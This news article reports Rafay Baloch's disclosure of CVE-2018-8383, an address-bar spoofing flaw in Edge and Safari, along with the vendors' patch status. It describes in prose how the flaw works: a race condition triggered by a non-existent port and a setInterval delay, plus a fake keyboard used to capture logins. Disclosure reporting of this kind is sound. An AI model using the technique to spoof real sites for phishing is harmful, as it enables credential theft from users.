Rafay Baloch has reported Vulnerability in Edge and Safari Browsers that Allows Address Bar Exploitation.
Nowadays the phishing attacks have become increasingly sophisticated and difficult to detect so it is indeed appreciable that security researchers are managing to spot such campaigns in their initial phases. Reportedly, a security researcher from Pakistan Rafay Baloch has discovered a flaw in the Safari browser that can bypass basic key indicators such as SSL and URL. It is worth noting that a user checks these indicators firstly to determine whether a website is genuine or fake.
According to the findings of Rafay Baloch, this flaw allows attackers to control the content displayed at the address bar while the method lets the attacker perform hard-to-detect phishing attacks. Called the browser bug, it is actually a race condition that forces the JavaScript to change the address bar even before fully loading the web page. The vulnerability has been given the tracking ID CVE-2018-8383 but it hasn’t been allotted a severity score as yet.
Baloch was also able to reproduce the bug in Edge and Safari browsers and both Microsoft and Apple were notified by him about the bug. Microsoft has already responded to the information and released a patch for Edge on 14th August in one of its security updates. However, Apple hasn’t yet offered any patch so far. The findings are now disclosed to the public because the three month grace period that is usually given to the related companies to fix the patch expired about a week ago.
If exploited successfully, the vulnerability will let an attack start loading a genuine webpage and once the address is displayed in the address bar, the attacker can replace the code quickly with a malicious one. However, the exploitation requires the attacker to trick the victim into loading a specially designed website, which can be done easily now that Apple has failed in providing a patch early on. This makes Safar browser vulnerable to attack.
“Upon requesting data from a non-existent port the address was preserved and hence a due to race condition over a resource requested from non-existent port combined with the delay induced by setInterval function managed to trigger address bar spoofing,” Baloch explains on his blog. “It causes the browser to preserve the address bar and to load the content from the spoofed page. The browser will however eventually load the resource, however, the delay induced with a setInterval function would be enough to trigger the address bar spoofing.”
The bug was also tested with proof-of-concept code or PoC Code and it was verified that the page loaded content from Gmail while it was hosted on sh3ifu.com and perfectly worked. Some of the elements though took longer to load, which hinted that the loading process wasn’t complete.
Baloch explains that his team was able to overcome the issue of delayed page loading on Safari, which doesn’t allow the user to type in fields when the page is loading, by adding a fake keyboard on the screen. The URL that appears in the address bar doesn’t change so the phishing attack becomes even more difficult to detect. The flaw can allow an attacker to impersonate any website such as Facebook, Twitter, Gmail, or banking website and create a fake login screen to steal private user data like username/password.
This is not the first time when Baloch has identified such critical flaws. Previously, he reported critical vulnerabilities in Firefox and Chrome browsers to vendors. Moreover; Baloch also reported vulnerabilities in Gmail that allowed anyone to hack Gmail based email addresses. Last but not the least; Baloch earned $10,000 in 2016 by reporting vulnerabilities in PayPal.